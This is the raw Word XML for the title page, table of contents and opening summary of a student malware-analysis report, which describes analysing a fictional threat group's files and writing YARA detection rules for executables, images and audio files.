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680"/>
          <w:tab w:val="right" w:leader="none" w:pos="9360"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="00000a"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="00000a"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="1197708" cy="1197708"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7"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197708" cy="119770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center" w:leader="none" w:pos="4680"/>
          <w:tab w:val="right" w:leader="none" w:pos="9360"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="00000a"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:leader="none" w:pos="4680"/>
          <w:tab w:val="right" w:leader="none" w:pos="9360"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="00000a"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="00000a"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Division of Information Technology &amp; Sciences</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:leader="none" w:pos="4680"/>
          <w:tab w:val="right" w:leader="none" w:pos="9360"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="00000a"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="00000a"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Department of Computer &amp; Digital Forensics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:leader="none" w:pos="4680"/>
          <w:tab w:val="right" w:leader="none" w:pos="9360"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="00000a"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="00000a"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FOR 330 – Malware Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:leader="none" w:pos="4680"/>
          <w:tab w:val="right" w:leader="none" w:pos="9360"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="00000a"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="00000a"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2025 Fall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:leader="none" w:pos="4680"/>
          <w:tab w:val="right" w:leader="none" w:pos="9360"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="00000a"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:leader="none" w:pos="4680"/>
          <w:tab w:val="right" w:leader="none" w:pos="9360"/>
        </w:tabs>
        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>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Title"/>
        <w:tabs>
          <w:tab w:val="center" w:leader="none" w:pos="4680"/>
          <w:tab w:val="right" w:leader="none" w:pos="9360"/>
        </w:tabs>
        <w:spacing w:before="480" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="1c4587"/>
          <w:sz w:val="76"/>
          <w:szCs w:val="76"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ighvj6glbs7m" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="1c4587"/>
          <w:sz w:val="76"/>
          <w:szCs w:val="76"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Searching for a Thug Part 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pP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0B">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="434343"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="434343"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A Continuation of the </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="434343"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="434343"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Thug Lyfe Threat Group Investigation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="434343"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="434343"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="434343"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="434343"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="434343"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="434343"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="434343"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="434343"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>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line="331.2" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Professor: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Duane Dunston</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:spacing w:line="331.2" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Authors:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Connor East, Savannah Ciak, Eamon Stackpole, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:spacing w:line="331.2" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lily Pouliot, Louis Mattiolo, Cameron Jalbert</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:spacing w:line="331.2" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Document Creation Date:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> October 5th, 2025</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:spacing w:line="331.2" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Document Last Update: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> October 13th, 2025</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="0b5394"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mw8ptfo8k9fy" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Table of Contents</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-164736814"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique w:val="1"/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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mw8ptfo8k9f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Contents</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</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gb7olqzzb5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Executive Summary</w:t>
              <w:tab/>
              <w:t xml:space="preserve">2</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hdhj036ykf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Findings</w:t>
              <w:tab/>
              <w:t xml:space="preserve">2</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sh51w6sjsh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Files Analyzed</w:t>
              <w:tab/>
              <w:t xml:space="preserve">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qrl70hvnr7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File Hashes</w:t>
              <w:tab/>
              <w:t xml:space="preserve">3</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526gu3xk1p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Supplemental Document References</w:t>
              <w:tab/>
              <w:t xml:space="preserve">4</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shceb7z2wv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GitHub Yara Rules</w:t>
              <w:tab/>
              <w:t xml:space="preserve">4</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uk9t7xhzpg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Copilot Formatting</w:t>
              <w:tab/>
              <w:t xml:space="preserve">4</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8qz3xkqw9q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Analysis Methodology</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1rlwbqu8g4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Analysis Environment</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tz8zds9wvq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YARA Rule Explanation</w:t>
              <w:tab/>
              <w:t xml:space="preserve">5</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bvqpj78t5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Malicious Techniques</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j2e5apekwf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File Sections</w:t>
              <w:tab/>
              <w:t xml:space="preserve">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8y0r7a8m8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File Configurations</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miiow2v4ax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Embedded Content</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qpknlbrcke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File Type Checks</w:t>
              <w:tab/>
              <w:t xml:space="preserve">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57cwmwwrf2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Testing the File Type Checks</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saeek9lcu7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Analysis Summary</w:t>
              <w:tab/>
              <w:t xml:space="preserve">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s68d5dzn14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Artifact #1: fileview.exe</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3jbz3nmku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Artifact #2: frontpage.jpg</w:t>
              <w:tab/>
              <w:t xml:space="preserve">10</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12xfxq7yk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Artifact #3: image_downloader.exe</w:t>
              <w:tab/>
              <w:t xml:space="preserve">11</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oubx7ct4fh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Artifact #4: SecurityAdvisory.docm</w:t>
              <w:tab/>
              <w:t xml:space="preserve">12</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fpjkdxliao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Artifact #5: volt.wav</w:t>
              <w:tab/>
              <w:t xml:space="preserve">14</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5nplm5focp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Custom YARA Rule: thugLyfe2.yar</w:t>
              <w:tab/>
              <w:t xml:space="preserve">14</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e03n9qr85j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False Positive Testing</w:t>
              <w:tab/>
              <w:t xml:space="preserve">15</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pa55uqcylb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 Environment and Directories</w:t>
              <w:tab/>
              <w:t xml:space="preserve">15</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71g3oi2hq9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Differences Between thugLyfe2.yar &amp; thugBehavior.yar</w:t>
              <w:tab/>
              <w:t xml:space="preserve">17</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z3qrptojdf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New Rule Creation</w:t>
              <w:tab/>
              <w:t xml:space="preserve">18</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5cg8h78bg0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Base64Decode.ps</w:t>
              <w:tab/>
              <w:t xml:space="preserve">18</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0xg8ut0u9l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Base64-Check PowerShell Script</w:t>
              <w:tab/>
              <w:t xml:space="preserve">20</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7fo3u74icn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EXIF_Base64_PowerShell_Command.yara</w:t>
              <w:tab/>
              <w:t xml:space="preserve">21</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q84fgks6d3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PE_Audio_Mismatch.yara</w:t>
              <w:tab/>
              <w:t xml:space="preserve">22</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wcyqdpbur6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PE_Image_Mismatch.yara</w:t>
              <w:tab/>
              <w:t xml:space="preserve">23</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k4hkqgf6fv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Audio_PE_Embedded..yara</w:t>
              <w:tab/>
              <w:t xml:space="preserve">24</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ctn4o2qzsi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Malicious_Office_AutoOpen_Macro.yar</w:t>
              <w:tab/>
              <w:t xml:space="preserve">25</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shy4btf74c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HighEntropyAny.yar</w:t>
              <w:tab/>
              <w:t xml:space="preserve">26</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zmwg5ljjz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Fixing the Image and Audio File Detections</w:t>
              <w:tab/>
              <w:t xml:space="preserve">27</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fi5vmq4lin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pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_c07aclzcljf5"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pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vgb7olqzzb5u" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Assignment #1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we were tasked with examining the first of two Thug Lyfe campaigns. During this phase, we tested our initial YARA rules (</w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">embedded_content</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">file_configuration</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">file_section</w:t>
        </w:r>
      </w:hyperlink>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color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">malicious_techniques</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) to identify suspicious behaviors and characteristics within executable files. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Assignment #2 expands the scope of analysis to image and audio files. Additionally, we tested and fixed our newly created </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">File Type Check rules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overall goals of this assignment were: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>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previously developed cursory YARA rules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>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and validate image and audio file detection rules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
      <w:pPr>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Differentiate between benign and malicious files using static analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>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new YARA rules based on observed behaviors and anomalies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">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the five files analyzed in Thug Lyfe’s second campaign, </w:t>
